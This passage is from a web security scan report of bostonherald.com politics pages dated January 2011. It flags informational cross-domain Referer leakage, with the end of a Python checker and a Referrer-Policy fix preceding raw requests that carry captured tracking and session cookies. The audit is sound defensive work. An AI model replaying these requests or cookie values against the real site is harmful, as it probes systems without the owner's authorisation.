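    for host, refs in third_party_refs(page_url, html).items():
        for tag, attr, url in refs:
            ref = referer_sent(page_url, url, policy)
            if ref and query in ref:
                mode = "automatic" if attr == "src" else "on-click"
                leaked.setdefault(host, set()).add(mode)
    return {h: sorted(m) for h, m in leaked.items()}


if __name__ == "__main__":
    for host, modes in sorted(leakage_report(PAGE_URL, SAMPLE_HTML).items()):
        print(f"{host:40s} {', '.join(modes)}")
    print("strict-origin-when-cross-origin:",
          leakage_report(PAGE_URL, SAMPLE_HTML, "strict-origin-when-cross-origin"))
```

Run as-is it lists every third-party host from the sample, all of them receiving the full URL, because the page and every reference are plain http and the legacy policy sends the complete URL. Re-running with "strict-origin-when-cross-origin" or "origin" empties the report, which is the practical fix: emit a Referrer-Policy header (or a referrer meta tag) on pages whose query string carries identifiers, and keep anything sensitive out of the URL altogether, since the policy only governs browsers that honour it.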

Request

GET /news/politics/?srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:28:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58044

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>
//-->

   <link rel="alternate" title="Local Politics - News &amp; Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif">&nbsp;<a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/news/politics/view/20110128speaker_deleo_shakes_up_house/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."></a>
...[SNIP]...
<a href="/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23, 2009 file photo in Boston."></a>
...[SNIP]...
<a href="/news/politics/view/20110128jeffrey_perry_rejects_hack_mantle/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/5e6415_jperry012811.jpg" alt="Jeffrey Perry."></a>
...[SNIP]...
<a href="/news/politics/view/20110127govs_painful_choices_critics_quick_to_pick_apart_305b_budget/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/38a71e_gov_01272011.jpg" alt="ON THE CHOPPING BLOCK: Gov. Deval Patrick, right, answers questions about his &#36;30.5B budget as Lt. Gov. Tim Murray looks on at the State House."></a>
...[SNIP]...
<a href="/news/politics/view/20110127lawyer_dimasi_bracing_for_difficult_fight/"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ad244_sal_01272011.jpg" alt="&#x2018;GOING ALL THE WAY TO TRIAL&#x2019;: Former House Speaker Salvatore F. DiMasi leaves U.S. District Court in
Boston yesterday with his wife, Deborah.">
</a>
...[SNIP]...
<a href="/news/regional/view.bg?articleid=1312541"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/867926_Splash_01282011.jpg" alt="Local Coverage" /></a>
...[SNIP]...
</div>    


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
<div style="margin:0 0 20px 0; line-height:16px; width:310px">
<img style="float:left; margin:0 5px 0 0; clear:both" src="http://cache.heraldinteractive.com/images/siteImages/slider/teases/taxDollars177.gif">
<span class="bold">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.284. http://www.bostonherald.com/news/politics/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains (the third-party hosts visible in the response below).

Request

GET /news/politics/view.bg?articleid=1312654 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:30:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Politics - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview%2F20110128mitt_romney_catches_up_with_boston_gop_pols%2Fsrvc%3Dhome%26position%3D5&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1" alt="Hillary Chabot" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(20) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Mitt Romney &lsquo;catches up&rsquo; with Boston GOP pols');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312654&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(20) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/cc02b1_ltpRomneyA012811.jpg" alt="Mitt Romney is seen in this April 23,..." /></div>
...[SNIP]...
<a href="/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" alt="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..." /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

17.285. http://www.bostonherald.com/news/politics/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/politics/view.bg

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains (the third-party hosts visible in the response below).

Request

GET /news/politics/view.bg?articleid=1312665&format=email HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:31:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Local Politics - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/politics/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fpolitics%2Fview.bg%3Farticleid%3D1312665%26format%3Demail&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<li class="SubNavMain"><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries&nbsp;</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div id="bylineArea">
                                        <img class="bylineImage" src="http://cache.heraldinteractive.com/images/siteImages/reporters/HillaryChabot.jpg?1=1" alt="Hillary Chabot" />
                                       <span class="bold">
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(26) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Speaker DeLeo shakes up House');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/politics/view.bg?articleid=1312665&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(26) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" alt="House Speaker Robert DeLeo is seen in..." /></div>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
